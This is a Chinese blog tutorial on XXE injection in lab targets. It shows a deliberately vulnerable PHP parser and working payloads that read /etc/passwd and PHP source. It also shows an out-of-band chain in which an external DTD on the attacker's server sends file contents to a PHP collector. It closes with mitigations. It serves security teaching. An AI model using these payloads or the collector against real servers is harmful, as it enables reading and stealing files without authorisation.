热门标签
热门文章
- 1【转】 数学建模竞赛的准备、技巧、选题、写作等各方面得总结_数学建模只写了6页少不少
- 2数据安全,中小微企业的刚需
- 3FPGA之串口收发字符串控制HMI串口屏之(一)——发送模块_fpga串口收发字符串控制hmi
- 4第二届中国生成式 AI 创新应用挑战赛号角吹响,来中国峰会现场一起为梦想加速!...
- 5STM32驱动步进电机;步进电机的驱动;步进电机驱动板的使用;STM32输出不同频率的波形;_步进电机ref current
- 6第九周:AIPM面试准备
- 7Web3 游戏周报(4.14-4.20)
- 8Pytorch 的数据处理 学习笔记_pytorch处理图片数据集
- 9当虚拟机报错:以独占方式锁定此配置文件失败,另一个正在运行的VMware进程可能正在使用配置文件
- 10在Linux上安装Nginx + Nginx 的基本配置_nginx 添加 mjs文件类型
当前位置: article > 正文
XEE漏洞任意文件读取
作者:菜鸟追梦旅行 | 2024-05-18 21:41:43
赞
踩
xee
目录
一、XEE漏洞简介
1、什么是XEE漏洞
XXE全称是——XML External Entity,也就是XML外部实体注入攻击。通过 XML实体,"SYSTEM”关键词导致XML解析器可以从本地文件或者远程URI中读取数据。所以攻击者可以通过XML实体传递自己构造的恶意值,使处理程序解析它。当引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
2、XML介绍
XML指可扩展标记语言(Extensible Markup Language)
XML是一种标记语言,很类似HTML
XML的设计宗旨是传输数据,而非显示数据。HTML被设计用来显示数据。
XML标签没有被预定义。您需要自行定义标签。
XML被设计为具有自我描述性。
XML是W3C的推荐标准。
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)><!ELEMENT body (#PCDATA)>
<!ENTITY free "free nice">
]>
<note>
<to>George&free;</to><from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body></note>
二、XXE 漏洞代码详解
1、XXE 漏洞代码
实验环境:开启 Metasploitable 靶机
root@metasploitable:~# cd /var/www/
root@metasploitable:~# vim xxe.php #插入以下内容
<?php$xml=file_get_contents("php://input");$data = simplexml_load_string($xml) ;echo "<pre>" ;print_r($data) ;echo "</pre>" ;?>
代码解释
file_get_contents() 函数把整个文件读入一个字符串中。
php://input #是个可以访问请求的原始数据的只读流。
结合 file_get_contents(“php://input”)可以读取 POST 提交的数据。存入
$xml
simplexml_load_string 函数介绍
php 中的 simplexml_load_string 函数将 xml 格式字符串转换为对应的 SimpleXMLElement
Object
例:使用 simplexml_load_string 将 note 输入 XML 数值打印出来
root@metasploitable:~# vim test.php
<?php$note= <<<XML<note><to>Tove</to><from>Jani</from><heading>Reminder</heading><body>Don't forget me this weekend!</body></note>XML;$xml=simplexml_load_string($note);print_r($xml);?>
注:黑客进行 XXE 注入的思路:
1、file_get_contents(“php://input”)可以读取 POST 提交的数据
2、那么我们通过 POST 提交 XML 代码,
3、XML 代码中引用外部 DTD,读取黑客想要的系统文件
4、通过 simplexml_load_string()函数显示数据。
即通过 simplexml_load_string()函数将 XML 代码和引用的系统文件转换成 SimpleXMLElement
Object 格式打印出来,此时加载的系统文件也会被打印出来。
2、XXE 漏洞演示
在 Kali 中开启 burpsuite 截断
访问:http://192.168.1.107/xxe.php
Payload 内容如下:
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:etc/passwd" >]><root><name>&xxe;</name></root>
在上面的代码中, XML 外部实体(外部实体在 XML 中被引用) xxe 被赋予的值为:
file:///etc/passwd。在解析 XML 文档的过程中,实体 'xxe' 的值会被替换为
URI(file://etc/passwd)内容值(也就是 passwd 文件的内容)。
关键字 'SYSTEM' 会告诉 XML 解析
器,'xxe' 实体的值将从其后的 URI 中读取,并把读取的内容替换 xxe 出现的地方。
假如 SYSTEM 后面的内容可以被用户控制,那么用户就可以随意替换为其他内容,从而读取服务器
本地文件(file:///etc/passwd)或者远程文件。
3、读取 PHP 文件
php 文件需要进行加密才能够被读取。
修改 payload 读取 xxe.php 文件,代码如下:
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php" >]><root><name>&xxe;</name></root>
php 文件经过 base64 加密之后就可以正常读取了。
这里推荐一下
php://filter
的用法
https://www.cnblogs.com/linuxsec/articles/12684259.html
使用bp自动的工具解码
三、无回显文件读取
1、实验拓扑
本实验环境采用PentesterLab
实验环境描述:Kali 作为黑客并建立黑客接收和提交数据的 Web 站点,PentesterLab 作为
server 被攻击端。
2、Kali 服务器准备工作
我们需要建立一个外部的 dtd 文件,一个用于接收数据的 php 文件,以及存储数据的数据文件。
(1)建立 dtd 外部实体文件:
└─# cd /var/www/html/
└─# vim test.dtd #插入以下内容
<!ENTITY % p1 SYSTEM "file:///etc/passwd"><!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://192.168.226.131/xxe.php?pass=%p1;'>">%p2;
注:% p1 定义一个参数实体,%和 p1 之间有一个空格,用于接收 file:///etc/passwd 的内
容,%p1 引用参数实体,参数实体只能在 DTD 文件中被引用。
(2)建立 php 文件
└─# vim xxe.php #插入以下内容
<?php$pass=$_GET['pass'];file_put_contents('pass.txt',$pass);?>
(3)创建存储数据的文件
└─# touch pass.txt
(4)修改文件权限
└─# chown -R www-data:www-data /var/www/html/*
(5)启动 apache2
└─# systemctl start apache2
(6)测试 php 文件能够正常写入数据
└─# curl http://
192.168.226.131
/xxe.php?pass=1
└─# cat pass.txt
3、进行 XXE 攻击
访问 PentesterLab 地址
点击 Login
开启 burpsuite 进行截断
直接点击登录,不需要输入用户名密码
Payload 代码:
<?xml version="1.0"?><!DOCTYPE e1 SYSTEM "http://192.168.226.131/test.dtd"><foo>&e1;</foo>修改抓到包的内容改:Content-Type: application/x-www-form-urlencoded为:Content-Type:text/xml
插入
Payload 代码
获取 passwd 文件内容
└─# cat pass.txt
四、XXE 漏洞修补
1、升级 libxml 版本
libxml2.9.0 以后,默认不解析外部实体
http://www.linuxfromscratch.org/blfs/view/cvs/general/libxml2.html
2、代码层防御
使用开发语言提供的禁用外部实体的方法
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
过滤用户提交的 XML 数据
关键词:<!DOCTYPE 和<!ENTITY,或者,SYSTEM 和 PUBLIC。
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/590000
推荐阅读
相关标签
